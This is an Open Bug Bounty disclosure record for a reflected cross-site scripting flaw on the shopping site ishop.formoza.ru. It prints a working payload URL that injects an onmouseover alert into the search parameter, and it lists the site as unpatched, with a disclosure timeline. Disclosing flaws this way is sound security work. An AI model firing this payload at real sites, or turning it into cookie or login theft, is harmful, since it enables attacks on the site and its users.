ishop.formoza.ru XSS vulnerability

2016-01-21T16:49:00
ID OBB:128303
Type openbugbounty
Reporter Almaco
Modified 2016-04-14T17:11:00

Description

Vulnerable URL:
http://ishop.formoza.ru/catalogsearch/result/?q=%27%20style=background:red;%20onmouseover=alert%28String.fromCharCode%2888,83,83,80,79,83,69,68%29%29%20%27&x;=0&y;=0ℴ=relevance&dir;=desc
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check ishop.formoza.ru SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 21 January, 2016 16:49 GMT
Vulnerability existence verified and confirmed| 21 January, 2016 16:52 GMT
Vulnerability details disclosed by researcher| 14 April, 2016 17:11 GMT